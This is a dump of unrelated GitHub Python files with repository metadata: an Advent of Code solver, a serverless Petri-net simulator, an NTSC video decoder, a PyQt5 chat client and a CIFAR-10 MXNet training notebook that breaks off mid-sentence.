mood']\n\n# print(trs.collaborative_filter('Pain,Excessive yawning,Depressed mood,Constipation,Excess saliva,Emotional lability', 'PLS (Primary Lateral Sclerosis)', 56, 'Male'))\n# print('Recommend Treatments: ', trs.collaborative_filter('Depressed mood', 'high blood pressure', 35, 'male'))\n #'Excessive daytime sleepiness (somnolence),Bowel problems, Emotional lability,Anxious mood,Brain fog,Stiffness/Spasticity,Bladder problems,Pain', 'Multiple Sclerosis', 54,'Female'))\n# 'Fingolimod,Interferon beta-1a IM Injection,Interferon beta-1a SubQ injection,Dimethyl fumarate,Teriflunomide,Baclofen']\n\n\nplt.ioff()\nplt.show()\n","repo_name":"sxu75374/TreatME-A-semantic-patient-similarity-based-treatment-recommendation-system","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":26377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16607499551","text":"from collections import defaultdict\nfrom typing import DefaultDict\n\nINPUT_FILE = \"./sample.txt\" if False else \"./input.txt\"\n\npolymer_template: str or None = None\npair_insertion_rules: DefaultDict = defaultdict(str)\nwith open(INPUT_FILE, \"r\") as input_file:\n for i, line in enumerate(map(str.strip, input_file.readlines())):\n if i == 0:\n polymer_template = line\n continue\n if i == 1 or not line:\n continue\n combination, insertion = list(map(str.strip, line.split(\"->\")))\n pair_insertion_rules[combination] = insertion\n\n\ndef part_1(steps=10):\n def get_new_polymer_template(template: str):\n new_template = list(template)\n inserted = []\n for x in range(len(template) - 1):\n insert = pair_insertion_rules[f\"{template[x]}{template[x + 1]}\"]\n if insert:\n new_template.insert(x + len(inserted) + 1, insert)\n inserted.append(insert)\n return \"\".join(new_template)\n\n new_template = str(polymer_template)\n for _ in range(steps):\n new_template = get_new_polymer_template(new_template)\n\n counter = defaultdict(int)\n most_common = new_template[0]\n least_common = new_template[0]\n for x in list(new_template):\n counter[x] += 1\n if counter[x] > counter[most_common]:\n most_common = x\n elif counter[x] < counter[least_common]:\n least_common = x\n print(f\"Part 1: {counter[most_common] - counter[least_common]}\")\n\n\ndef part_2():\n single_count = defaultdict(int)\n for x in list(polymer_template):\n single_count[x] += 1\n\n pairs = defaultdict(int)\n for x in range(len(polymer_template) - 1):\n pairs[polymer_template[x] + polymer_template[x + 1]] += 1\n\n for _ in range(40):\n inserted = []\n for pair in pair_insertion_rules.keys():\n if pair in pairs:\n inserted.append((pair, pair_insertion_rules[pair], pairs[pair]))\n del pairs[pair]\n\n for pair, insert, cnt in inserted:\n single_count[insert] += cnt\n pairs[pair[0] + insert] += cnt\n pairs[insert + pair[1]] += cnt\n\n print(f\"Part 2: {max(single_count.values()) - min(single_count.values())}\")\n\n\npart_1()\npart_2()\n","repo_name":"JJStoker/AOC","sub_path":"2021/14/extended_polymerization.py","file_name":"extended_polymerization.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"14065250349","text":"from slappsim.Petri import *\nfrom slappsim.States import Start\nfrom slappsim.Function import Function, FunctionStart\nfrom slappsim.Structures import Structure\nfrom slappsim.States import End\nfrom typing import List, Dict, Tuple\nfrom functools import partial\nimport multiprocessing\n\n\ndef zero_delay():\n return 0\n\n\nclass PetriApp(Petri):\n \"\"\"Serverless application CSPN model\n\n Conditional stochastic Petri net model of the serverless application\n\n Attributes:\n functions: A list of serverless functions in the CSPN model (F).\n transitions: A list of transitions in the CSPN model.\n structures: A list of structures in the serverless application (optional).\n delays: A dictionary that contains the partial functions to generate random delay for different delay types.\n pgs: Price per GB-second USD.\n ppi: Price per invocation in USD.\n\n \"\"\"\n\n def __init__(self, functions: List[Function], transitions: List[Transition], structures: List[Structure] = None,\n delays: Dict[str, partial] = None,\n pgs: float = 0.0000166667, ppi: float = 0.0000002) -> None:\n \"\"\"Inits the application CSPN model.\"\"\"\n self.functions = functions\n self.functions_map = {function.name: function for function in functions if function.name is not None}\n self.transitions = set(transitions)\n self.structures = [transition.parent_structure for transition in self.transitions if\n transition.parent_structure is not None]\n self.structures = list(set(self.structures))\n Petri.__init__(self, transitions=list(self.transitions))\n self.arcs = [item for transition in self.transitions for item in transition.in_arcs + transition.out_arcs]\n self.places = set([arc.place for arc in self.arcs])\n self.terminals = set([place for place in self.places if issubclass(place.__class__, End)])\n self.cost = None\n self.cost_records = []\n self.pgs = pgs\n self.pmms = self.pgs / 1024 / 1000\n self.ppi = ppi\n self.delays = delays if delays is not None else {}\n self.scheduling_overhead = None\n self.update_delays()\n\n def update_delays(self) -> None:\n \"\"\"Updates the delay\n\n Generates new delays for different types of transitions.\n Initializes the partial function to generate the scheduling overhead of the application.\n\n \"\"\"\n zero_delay_fun = partial(zero_delay)\n for transition in self.transitions:\n if transition.label is not None and self.delays.get(transition.label, None) is not None:\n transition.delay_fun = self.delays[transition.label]\n transition.sample()\n self.scheduling_overhead = self.delays.get(\"SchedulingOverhead\", zero_delay_fun)\n\n def reset(self) -> None:\n \"\"\"Resets the CSPN model\n\n Removes all tokens.\n Generates new firing delay (response time) and communication delay for serverless functions.\n\n \"\"\"\n for place in self.places:\n if type(place) is Start:\n place.holding = Token(elapsed_time=0)\n else:\n place.holding = None\n for function in self.functions:\n function.sample()\n\n def execute(self) -> Tuple[float, float, str, List]:\n \"\"\"Runs the CSPNs.\n\n Checks the enabled transitions, fires the enabled transitions, and solves the conflicts.\n\n Returns:\n A 4-tuple that contains the end-to-end response time, total cost, exit status, and firing logs.\n \"\"\"\n cost_list = []\n terminals_with_holding = []\n firing_logs = []\n while True:\n fired_transitions = self.run()\n for transition in fired_transitions:\n if transition.label == \"FunctionExecution\" or transition.label == \"Task\":\n cost_list.append((transition.last_fired_time, transition.get_cost(self.pmms, self.ppi)))\n firing_logs.append((transition.uid, transition.last_fired_time, transition.required_time,\n transition.get_cost(self.pmms, self.ppi)))\n else:\n firing_logs.append((transition.uid, transition.last_fired_time, transition.required_time, 0))\n is_terminated = False\n for terminal in self.terminals:\n if terminal.holding is not None:\n terminals_with_holding.append(terminal)\n if len(fired_transitions) == 0:\n is_terminated = True\n if is_terminated:\n break\n terminal_holdings = [terminal.holding for terminal in terminals_with_holding]\n elapsed_time = [token.elapsed_time for token in terminal_holdings]\n terminal_time = min(elapsed_time)\n cost = sum([cost for time, cost in cost_list if time <= terminal_time])\n exit_point = terminals_with_holding[elapsed_time.index(terminal_time)]\n firing_logs = [log for log in firing_logs if log[1] <= terminal_time]\n terminal_time = terminal_time + self.scheduling_overhead()\n return terminal_time, cost, exit_point.label, firing_logs\n\n def _execute(self, k: int) -> Tuple[List, List, List, List]:\n \"\"\"Runs the CSPNs k times\n\n Returns:\n A 4-tuple that contains the list of the end-to-end response time, list of the total cost, list of the exit\n status, and list of the firing logs. Each list has k elements.\n \"\"\"\n terminal_time = []\n cost = []\n exit_status = []\n firing_logs = []\n for i in range(k):\n self.reset()\n ert, c, status, log = self.execute()\n terminal_time.append(ert)\n cost.append(c)\n exit_status.append(status)\n firing_logs.append(log)\n return terminal_time, cost, exit_status, firing_logs\n\n def profile(self, k: int, cpu_count: int = None) -> Tuple[List, List, List, List]:\n \"\"\"Runs the CSPNs k times (parallel computing)\"\"\"\n cpu_count = multiprocessing.cpu_count() if cpu_count is None else cpu_count\n pool = multiprocessing.Pool(cpu_count)\n results = pool.map(self._execute, [int(k / cpu_count) for i in range(cpu_count)])\n pool.close()\n pool.join()\n terminal_time = []\n cost = []\n exit_status = []\n firing_logs = []\n for res in results:\n ert, c, status, log = res\n terminal_time += ert\n cost += c\n exit_status += status\n firing_logs += log\n return terminal_time, cost, exit_status, firing_logs\n","repo_name":"pacslab/SLAppMdlOpt","sub_path":"slappsim/PetriApp.py","file_name":"PetriApp.py","file_ext":"py","file_size_in_byte":6713,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"26708941676","text":"import struct\nfrom PIL import Image\nimport fir_filter\nimport dll\nfrom math import sin, cos, pi\n\n\nrate = 315/88/108\n\nsync_start = 0\nsync_start_prev = 0\nsync_cnt = 0\nbackport_cnt = 0\ncolorburst_cnt = 0\nbackport_post_cnt = 0\nline_cnt = 0\n\nin_sync = False\nin_backporch = False\nin_colorburst = False\nin_backport_post = False\nin_line = False\nin_field = False\n\nline_has_color = False\n\nfields = []\nlines = []\nline = []\n\ncolorburst = []\ncos_filter = fir_filter.FirFilterLowPassRect(64, 0.044/8)\nsin_filter = fir_filter.FirFilterLowPassRect(64, 0.044/8)\ny_filter = fir_filter.FirFilterLowPassRect(64, 0.143/8)\n\n# Line sync is 63, so +- 10%\n#LINE_SYNC_MIN = 57\nLINE_SYNC_MIN = 50 * 8\nLINE_SYNC_MAX = 69 * 8\n\n#FIELD_SYNC_LEN = 362\nFIELD_SYNC_MIN = 350 * 8\nFIELD_SYNC_MAX = 370 * 8\n\nFIELD_CNT_MIN = 253\nFIELD_CNT_MAX = 254\n\nline_value = []\nprev_line_value = []\n\nPRE_START_ACTIVE_VIDEO_LINES = 11\n\nFRAME_HEIGHT = (FIELD_CNT_MAX - PRE_START_ACTIVE_VIDEO_LINES) * 2\n\nline_max_val = 0\nline_min_val = 1000000\n\nprint('Processing input.')\nwith open('upsampled.raw', 'rb') as f:\n b = f.read()\nj = 0\nfor i in range(len(b)):\n pair = b[i*2:i*2+2]\n value = struct.unpack('= LINE_SYNC_MIN and sync_cnt <= LINE_SYNC_MAX:\n #print('Line sync. Lines so far: %d' % (len(lines)))\n in_backporch = True\n in_field = False\n\n elif sync_cnt >= FIELD_SYNC_MIN and sync_cnt <= FIELD_SYNC_MAX:\n #print('Field sync')\n if not in_field:\n #print('New field. Existing field len %d' % (len(lines)))\n if len(lines) < FIELD_CNT_MIN or len(lines) > FIELD_CNT_MAX:\n pass\n #print('Invalid previous field. Skipping')\n else:\n fields.append(lines[PRE_START_ACTIVE_VIDEO_LINES:])\n if len(fields) == 2:\n break\n lines = []\n in_field = True\n\n sync_cnt = 0\n\n\n if in_backporch:\n backport_cnt += 1\n\n if backport_cnt > 65:\n backport_cnt = 0\n in_backporch = False\n in_colorburst = True\n colorburst = []\n\n if in_colorburst:\n colorburst.append(value)\n colorburst_cnt += 1\n\n if colorburst_cnt > 270:\n colorburst_cnt = 0\n in_colorburst = False\n in_backport_post = True\n # Does it look like this was a colorburst? Ideally would run through a\n # filter or detector or something but for now just check if there was\n # significant variation in the min and max excursion of the signal.\n def figure_out_things():\n global line_has_color\n mi, ma = 1000000, 0\n a = 0\n for v in colorburst:\n a += v\n if v < mi: mi = v\n if v > ma: ma = v\n a /= len(colorburst)\n s = ma - mi\n if s < 100:\n # Probably not a colorburst.\n return\n else:\n line_has_color = True\n # Normalize and offset so the delay locked loop can sync with it.\n burst_offset = []\n for v in colorburst:\n burst_offset.append((v-a)/s*2)\n # Calibrate the delay locked loop.\n #print(burst_offset)\n dll.lock(burst_offset)\n #print('Colorburst over at i %d' % (i))\n figure_out_things()\n\n # It's important from this point on that the DLL osscilator tick one for\n # each sample so that it remains in lock with the colorburst signal, even if\n # we're not decoding color at the moment.\n if in_backport_post:\n dll.tick()\n backport_post_cnt += 1\n\n if backport_post_cnt > 151:\n backport_post_cnt = 0\n in_backport_post = False\n in_line = True\n line_max_val = 0\n line_min_val = 1000000\n print(len(lines))\n\n if in_line:\n cos_osc, sin_osc = dll.tick()\n \n if value > line_min_val: line_min_val = value\n if value < line_max_val: line_max_val = value\n \n offset_px = max(value - 530, 0)\n scaled_px = min(int(offset_px / 6.046875), 255)\n scaled_px /= 255\n line_value.append(scaled_px)\n\n deg33 = 11*pi/60\n\n if len(prev_line_value) > line_cnt:\n averaged_px = ( -1 * prev_line_value[line_cnt] + scaled_px ) / 2\n else:\n averaged_px = scaled_px\n\n u_mult = cos_osc * averaged_px\n v_mult = sin_osc * averaged_px\n\n # Filter the u and v to 600 kHz since that's what the limit of vision\n # bandwidth is and to remove the demodulation sidebands.\n # Filter the y to 4.2 since that's the NTSC vision bandwidth limit.\n # (Note that we're assuming we're sampling at 13.5 MHz which means that\n # the original picture has a bandwidth of 6.75 Mhz)\n uu = cos_filter.filter(u_mult) * 2\n vv = sin_filter.filter(v_mult) * 2\n yy = y_filter.filter(scaled_px)\n\n # Given y and scaled u and v, turn back into RGB.\n rr = vv/0.877 + yy\n bb = uu/0.493 + yy\n gg = -0.509*(rr-yy) - 0.194*(bb-yy) + yy\n line.append((int(rr*255),int(gg*255),int(bb*255)))\n line_cnt += 1\n\n #if line_cnt > 714 * 8:\n if line_cnt > 714 * 8:\n line_cnt = 0\n in_line = False\n lines.append(line)\n prev_line_value = line_value\n line_value = []\n print('Line min %d max %d' % (line_min_val, line_max_val))\n #print('Line %d min %d max %d' % (len(lines), min(line), max(line)))\n line = []\n #print('Reading line %d' % (len(lines)))\n\nprint('Done')\nprint('Creating image.')\nim = Image.new('RGB', (715, FRAME_HEIGHT))\nfor f in range(2):\n for y, line in enumerate(fields[f]):\n #for x, px in enumerate(line):\n for x in range(len(line)//8):\n px = line[x*8]\n im.putpixel((x,y*2+f), px)\nim.save('image.png')\nprint('Done')","repo_name":"gabesk/tv_python","sub_path":"convert_fields_inter_3.py","file_name":"convert_fields_inter_3.py","file_ext":"py","file_size_in_byte":6637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28510846393","text":"import socket\nimport sys\nimport threading\nimport time\nimport functools\nfrom PyQt5 import QtCore, QtGui\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QWidget, QPushButton\nfrom PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout, QMessageBox, QTabWidget\nfrom PyQt5.QtWidgets import QGridLayout, QScrollArea, QLabel, QListView\nfrom PyQt5.QtWidgets import QLineEdit, QComboBox, QGroupBox, QAction\nfrom PyQt5.QtGui import QStandardItemModel, QStandardItem, QFont\n\nclass MyTableWidget(QWidget):\n def __init__(self, parent):\n super(QWidget, self).__init__(parent)\n \n self.conn = socket.socket()\n self.connected = False\n \n self.layout = QVBoxLayout(self)\n self.tabs = QTabWidget()\n self.tabs.resize(300,200) \n self.tab1 = QWidget()\n self.tab2 = QWidget()\n self.tabs.addTab(self.tab1, \"Home\")\n self.tabs.addTab(self.tab2, \"Chat Room\")\n self.tabs.setTabEnabled(1,False)\n \n gridHome = QGridLayout()\n self.tab1.setLayout(gridHome)\n self.IPBox = QGroupBox(\"IP\")\n self.IPLineEdit = QLineEdit()\n self.IPLineEdit.setText(\"127.0.0.1\")\n IPBoxLayout = QVBoxLayout()\n IPBoxLayout.addWidget(self.IPLineEdit)\n self.IPBox.setLayout(IPBoxLayout)\n self.portBox = QGroupBox(\"port\")\n self.portLineEdit = QLineEdit()\n self.portLineEdit.setText(\"33002\")\n portBoxLayout = QVBoxLayout()\n portBoxLayout.addWidget(self.portLineEdit)\n self.portBox.setLayout(portBoxLayout)\n self.nameBox = QGroupBox(\"Név\")\n self.nameLineEdit = QtWidgets.QLineEdit()\n nameBoxLayout = QVBoxLayout()\n nameBoxLayout.addWidget(self.nameLineEdit)\n self.nameBox.setLayout(nameBoxLayout)\n self.connStatus = QLabel(\"Státusz\", self)\n font = QFont()\n font.setPointSize(16)\n self.connStatus.setFont(font)\n self.connBtn = QPushButton(\"Csatlakozás\")\n self.connBtn.clicked.connect(self.connect_server)\n self.disconnBtn = QPushButton(\"Kilépés\")\n self.disconnBtn.clicked.connect(self.disconnect_server)\n gridHome.addWidget(self.IPBox,0,0,1,1)\n gridHome.addWidget(self.portBox,0,1,1,1)\n gridHome.addWidget(self.nameBox,1,0,1,1)\n gridHome.addWidget(self.connStatus,1,1,1,1)\n gridHome.addWidget(self.connBtn,2,0,1,1)\n gridHome.addWidget(self.disconnBtn,2,1,1,1)\n gridHome.setColumnStretch(0, 1)\n gridHome.setColumnStretch(1, 1)\n gridHome.setRowStretch(0, 0)\n gridHome.setRowStretch(1, 0)\n gridHome.setRowStretch(2, 9)\n \n \n gridChatRoom = QGridLayout()\n self.tab2.setLayout(gridChatRoom)\n self.messageRecords = QLabel(\"Welcome to chat room\", self)\n self.messageRecords.setStyleSheet(\"background-color: white;\");\n self.messageRecords.setAlignment(QtCore.Qt.AlignTop)\n self.messageRecords.setAutoFillBackground(True);\n self.scrollRecords = QScrollArea()\n self.scrollRecords.setWidget(self.messageRecords)\n self.scrollRecords.setWidgetResizable(True)\n self.sendTo = \"ALL\"\n self.sendChoice = QLabel(\"Send to :ALL\", self)\n self.sendComboBox = QComboBox(self)\n self.sendComboBox.addItem(\"ALL\")\n self.sendComboBox.activated[str].connect(self.send_choice)\n self.lineEdit = QLineEdit()\n self.lineEnterBtn = QPushButton(\"Enter\")\n self.lineEnterBtn.clicked.connect(self.enter_line)\n self.lineEdit.returnPressed.connect(self.enter_line)\n self.friendList = QListView()\n self.friendList.setWindowTitle('Room List')\n self.model = QStandardItemModel(self.friendList)\n self.friendList.setModel(self.model)\n self.emojiBox = QGroupBox(\"Emoji\")\n self.emojiBtn1 = QPushButton(\"ก็ʕ•͡ᴥ•ʔ ก้\")\n self.emojiBtn1.clicked.connect(functools.partial(self.send_emoji, \"ก็ʕ•͡ᴥ•ʔ ก้\"))\n self.emojiBtn2 = QPushButton(\"(。◕∀◕。)\")\n self.emojiBtn2.clicked.connect(functools.partial(self.send_emoji, \"(。◕∀◕。)\"))\n self.emojiBtn3 = QPushButton(\"( ˘・з・)\")\n self.emojiBtn3.clicked.connect(functools.partial(self.send_emoji, \"( ˘・з・)\"))\n self.emojiBtn4 = QPushButton(\"ᕦ(ò_óˇ)ᕤ\")\n self.emojiBtn4.clicked.connect(functools.partial(self.send_emoji, \"ᕦ(ò_óˇ)ᕤ\"))\n emojiLayout = QHBoxLayout()\n emojiLayout.addWidget(self.emojiBtn1)\n emojiLayout.addWidget(self.emojiBtn2)\n emojiLayout.addWidget(self.emojiBtn3)\n emojiLayout.addWidget(self.emojiBtn4)\n self.emojiBox.setLayout(emojiLayout)\n gridChatRoom.addWidget(self.scrollRecords,0,0,1,3)\n gridChatRoom.addWidget(self.friendList,0,3,1,1)\n gridChatRoom.addWidget(self.sendComboBox,1,0,1,1)\n gridChatRoom.addWidget(self.sendChoice,1,2,1,1)\n gridChatRoom.addWidget(self.lineEdit,2,0,1,3)\n gridChatRoom.addWidget(self.lineEnterBtn,2,3,1,1)\n gridChatRoom.addWidget(self.emojiBox,3,0,1,4)\n gridChatRoom.setColumnStretch(0, 9)\n gridChatRoom.setColumnStretch(1, 9)\n gridChatRoom.setColumnStretch(2, 9)\n gridChatRoom.setColumnStretch(3, 1)\n gridChatRoom.setRowStretch(0, 9)\n \n \n self.layout.addWidget(self.tabs)\n self.setLayout(self.layout) \n \n def enter_line(self):\n \n if self.sendTo != self.sendComboBox.currentText():\n self.message_display_append(\"Sikertelen küldés!\")\n self.lineEdit.clear()\n return\n line = self.lineEdit.text()\n if line == \"\":\n return\n if self.sendTo != \"ALL\":\n send_msg = bytes(\"{\"+self.userName+\"}\"+line, \"utf-8\")\n self.conn.send(send_msg)\n time.sleep(0.1)\n send_msg = bytes(\"{\"+self.sendTo+\"}\"+line, \"utf-8\")\n self.conn.send(send_msg)\n self.lineEdit.clear()\n self.scrollRecords.verticalScrollBar().setValue(self.scrollRecords.verticalScrollBar().maximum())\n \n def send_emoji(self, emoji):\n if self.sendTo != self.sendComboBox.currentText():\n self.message_display_append(\"The person left. Private message not delivered\")\n return\n if self.sendTo != \"ALL\":\n send_msg = bytes(\"{\"+self.userName+\"}\"+emoji, \"utf-8\")\n self.conn.send(send_msg)\n time.sleep(0.1)\n send_msg = bytes(\"{\"+self.sendTo+\"}\"+emoji, \"utf-8\")\n self.conn.send(send_msg)\n \n def message_display_append(self, newMessage, textColor = \"#000000\"):\n oldText = self.messageRecords.text()\n appendText = oldText+\"
    \"+newMessage+\"\"\n self.messageRecords.setText(appendText)\n time.sleep(0.2) #this helps the bar set to bottom, after all message already appended\n self.scrollRecords.verticalScrollBar().setValue(self.scrollRecords.verticalScrollBar().maximum())\n \n def updateRoom(self):\n while self.connected:\n data = self.conn.recv(1024)\n data = data.decode(\"utf-8\")\n print(data)\n if data != \"\":\n if \"{CLIENTS}\" in data:\n welcome = data.split(\"{CLIENTS}\")\n self.update_send_to_list(welcome[1])\n self.update_room_list(welcome[1])\n if not welcome[0][5:] == \"\":\n self.message_display_append(welcome[0][5:])\n self.scrollRecords.verticalScrollBar().setValue(self.scrollRecords.verticalScrollBar().maximum())\n elif data[:5] == \"{MSG}\":\n self.message_display_append(data[5:], \"#006600\")\n self.scrollRecords.verticalScrollBar().setValue(self.scrollRecords.verticalScrollBar().maximum())\n else:\n self.message_display_append(\"{private}\"+data, \"#cc33cc\")\n self.scrollRecords.verticalScrollBar().setValue(self.scrollRecords.verticalScrollBar().maximum())\n time.sleep(0.1)\n \n def connect_server(self):\n if self.connected == True:\n return\n name = self.nameLineEdit.text()\n if name == \"\":\n self.connStatus.setText(\"Státusz :\"+\"Adj meg egy nevet\")\n return\n self.userName = name\n IP = self.IPLineEdit.text()\n if IP == \"\":\n IP = \"127.0.0.1\"\n port = self.portLineEdit.text()\n if port == \"\" or not port.isnumeric():\n self.portLineEdit.setText(\"33002\")\n self.connStatus.setText(\"Státusz :\"+\"Sikertelen kapcsolódás\")\n return \n else:\n port = int(port)\n try:\n self.conn.connect((IP, port))\n except:\n self.connStatus.setText(\"Státusz :\"+\"Sikertelen kapcsolódás\")\n self.conn = socket.socket()\n return\n send_msg = bytes(\"{REGISTER}\"+name, \"utf-8\")\n self.conn.send(send_msg)\n self.connected = True \n self.connStatus.setText(\"Status :\"+\"Sikeres kapcsolódás\")\n self.nameLineEdit.setReadOnly(True)\n self.tabs.setTabEnabled(1,True)\n self.rT = threading.Thread(target= self.updateRoom)\n self.rT.start()\n\n def disconnect_server(self):\n if self.connected == False:\n return\n send_msg = bytes(\"{QUIT}\", \"utf-8\")\n self.conn.send(send_msg)\n self.connStatus.setText(\"Státusz :\"+\" Lecsatlakozva\")\n self.nameLineEdit.setReadOnly(False)\n self.nameLineEdit.clear()\n self.tabs.setTabEnabled(1,False)\n self.connected = False\n self.rT.join()\n self.conn.close()\n self.conn = socket.socket()\n \n def update_room_list(self, strList):\n L = strList.split(\"|\")\n self.model.clear()\n for person in L:\n item = QStandardItem(person)\n item.setCheckable(False)\n self.model.appendRow(item)\n \n def update_send_to_list(self, strList):\n L = strList.split(\"|\")\n self.sendComboBox.clear()\n self.sendComboBox.addItem(\"ALL\")\n for person in L:\n if person != self.userName:\n self.sendComboBox.addItem(person)\n previous = self.sendTo\n index = self.sendComboBox.findText(previous)\n print(\"previous choice:\",index)\n if index != -1:\n self.sendComboBox.setCurrentIndex(index)\n else:\n self.sendComboBox.setCurrentIndex(0)\n \n def send_choice(self,text):\n self.sendTo = text\n print(self.sendTo)\n self.sendChoice.setText(\"Küldés: \"+text)\n\nclass Window(QMainWindow):\n def __init__(self):\n super(Window, self).__init__()\n self.setGeometry(50, 50, 500, 300)\n self.setWindowTitle(\"ChatApp\") \n self.table_widget = MyTableWidget(self)\n self.setCentralWidget(self.table_widget)\n self.show()\n \n def closeEvent(self, event):\n close = QMessageBox()\n close.setText(\"Biztos vagy benne?\")\n close.setStandardButtons(QMessageBox.Yes | QMessageBox.Cancel)\n close = close.exec()\n if close == QMessageBox.Yes:\n self.table_widget.disconnect_server()\n event.accept()\n else:\n event.ignore()\n\ndef run():\n app = QApplication(sys.argv)\n GUI = Window()\n sys.exit(app.exec_())\n\nif __name__ == \"__main__\":\n run() ","repo_name":"milanmarko/chatAppIkt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11639,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"13180372297","text":"\n# coding: utf-8\n\n# # Demo model applied to CIFAR-10\n# Dataset https://www.cs.toronto.edu/~kriz/cifar.html\n\n# We use only the 1st batch of CIFAR-10 dataset: 10000 images 32x32x3 and 10 labels.\n\n# ### Load dependencies\n\n# In[1]:\n\n\nimport os\nimport tarfile\nimport pickle\nimport urllib.request\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport operator\nimport mxnet as mx\nimport logging\n\n\n# ### Prepare training and test datasets\n# `download_data` downloads data from a given `url`, if no file with the same name has been downloaded so far, \n# `prepare_img` transforms 3 channels (rgb) to one channel (their mean value), reshapes data, adding one axis of length 1 and normalizes the entries to [0,1], \n# `read_CIFAR10` creates labels and datasets from the corresponding \"batch\" files (see [CIFAR dataset description](https://www.cs.toronto.edu/~kriz/cifar.html))\n# \n# With these functions we download data from CIFAR web page, create training/test datasets/labels and then split them into batches of size 150 (shuffle for training). \n# Dataset gets the name `'data'`, labels - `'label'`\n\n# In[2]:\n\n\ndef download_data(url, force_download=True): \n fname = url.split(\"/\")[-1]\n \n if force_download or not os.path.exists(fname):\n urllib.request.urlretrieve(url, fname)\n \n return fname\n\n\ndef unpickle(file):\n with open(file, 'rb') as fo:\n dict = pickle.load(fo, encoding='bytes')\n \n return dict\n\n\ndef read_CIFAR10():\n url = 'https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz'\n tar = tarfile.open(download_data(url, False))\n tar.extractall()\n tar.close()\n \n dict_1 = unpickle(\"cifar-10-batches-py/data_batch_1\")\n \n train_img = dict_1[b'data'].reshape(10000, 3, 1024)\n train_img = train_img.transpose(0,2,1)\n train_lbl = np.array(dict_1[b'labels'])\n \n dict_test_1 = unpickle(\"cifar-10-batches-py/test_batch\")\n \n test_img = dict_test_1[b'data'].reshape(10000, 3, 1024)\n test_img = test_img.transpose(0,2,1)\n test_lbl = np.array(dict_test_1[b'labels'])\n\n return train_img, train_lbl, test_img, test_lbl\n\n\ndef prepare_img(img):\n # mean across rgb\n img = np.mean(img, -1)\n \n # normalize\n img = img.astype(np.float32) / 255\n \n # reshape to 4-D\n img = img.reshape(img.shape[0], 1, 32, 32)\n \n return img\n\n\n# In[6]:\n\n\ntrain_img, train_lbl, test_img, test_lbl = read_CIFAR10()\n\ntrain_img = prepare_img(train_img)\ntest_img = prepare_img(test_img)\n\nbatch_size = 150\n\ntrain_data_iter = mx.io.NDArrayIter(data={'data': train_img}, label= {'label': train_lbl}, batch_size=batch_size, shuffle=True)\ntest_data_iter = mx.io.NDArrayIter(data={'data': test_img}, label= {'label': test_lbl}, batch_size=batch_size)\n\n\n# Load and print label names:\n\n# In[4]:\n\n\ndef load_classes():\n path = 'cifar-10-batches-py/'\n file = 'batches.meta'\n \n f = open(path+file, 'rb')\n dict = pickle.load(f)\n return dict['label_names']\n\ndef print_classes(label_names):\n for i in range(0, 10):\n print(str(i) + \" : \" + label_names[i] + \" \")\n\nlabel_names = load_classes()\nprint_classes(label_names)\n\n\n# ### Display example training data\n# \n# The original Fashion-MNIST consists of 28x28 grayscale images.\n\n# In[7]:\n\n\npict_number = 7\n\nfor i in range(pict_number):\n plt.subplot(1,pict_number,i+1)\n #dsp_img = train_img[i].reshape(32,32,3)\n dsp_img = train_img[i].reshape(32,32)\n #plt.imshow(dsp_img)\n plt.imshow(dsp_img, cmap = \"Greys_r\")\n plt.axis('off')\n\nplt.show()\n\nprint('labels: %s' % (train_lbl[0:pict_number],))\nprint(operator.itemgetter(*train_lbl[0:pict_number])(label_names))\n\n\n# ### Build MXNet model\n# \n# For building our NN we will use Symbol API, an interface for symbolic programming.\n# \n# First, we create two placeholders for labels and data inputs with `mx.sym.Variable` and give them names`'fashion_item_label'` and `'fashion_data'` correspondingly. On the next step the data will be flatten to 2-D.\n\n# In[8]:\n\n\nlabel = mx.sym.Variable('label')\n\n# input\ndata = mx.symbol.Variable('data')\n\n# Flatten the data from 4-D shape into 2-D (batch_size, num_channel*width*height)\ndata = mx.sym.flatten(data=data, name='flatten')\n\n\n# `Symbol` also supports a rich set of neural network layers. The folowing code constructs a 3-layer fully connected neural network with the 1st hidden layer having 128 neurons, the 2nd hidden layer having 64 neurons, both activated by ReLU activation function and softmax output layer `mlp`.\n# \n# Then we visualize the structure of that network with `mx.viz.plot_network`.\n\n# In[9]:\n\n\n# 1st fully-connected layer + activation function\nfc1 = mx.sym.FullyConnected(data=data, num_hidden=128)\nact1 = mx.sym.Activation(data=fc1, act_type=\"relu\")\n\n# 2nd fully-connected layer + activation function\nfc2 = mx.sym.FullyConnected(data=act1, num_hidden=64)\nact2 = mx.sym.Activation(data=fc2, act_type=\"relu\")\n\n# 3rd fully connected layer (MNIST uses 10 classes)\nfc3 = mx.sym.FullyConnected(data=act2, num_hidden=10)\n\n# softmax with cross entropy loss\nmlp = mx.sym.SoftmaxOutput(data=fc3, label=label, name='softmax')\n\nmx.viz.plot_network(mlp)\n\n\n# ### Train the model and commit checkpoints\n# \n# First, set up logging to INFO level and the context (now CPU is used).\n\n# In[10]:\n\n\nlogging.basicConfig(level=logging.INFO)\nlogging.getLogger().setLevel(logging.INFO)\n\nctx = mx.cpu() # for GPU change to mx.gpu()\n\n\n# MXNet modularizes commonly used code for training and inference in the `module` (`mod` for short) package.\n# \n# We can construct a module by specifying the following parameters:\n# \n# - `symbol`: the network definition (`mlp` in our case)\n# - `context`: the device (or a list of devices) to use for execution (`ctx` in our case)\n# - `data_names` : the list of input data variable names (`'data'` in our case)\n# - `label_names` : the list of input label variable names (`'label'` in our case)\n\n# In[11]:\n\n\nmod = mx.mod.Module(symbol=mlp, data_names=['data'], label_names=['label'], context=ctx, logger=logging)\n\n\n# `Module` provides both high-level and intermediate-level interfaces for executing predefined networks. We will use a high-level-interface function [`mod.fit`](http://mxnet.io/api/python/module.html#mxnet.module.BaseModule.fit) to train the model, which internally executes the following steps:\n# \n# - `bind` : 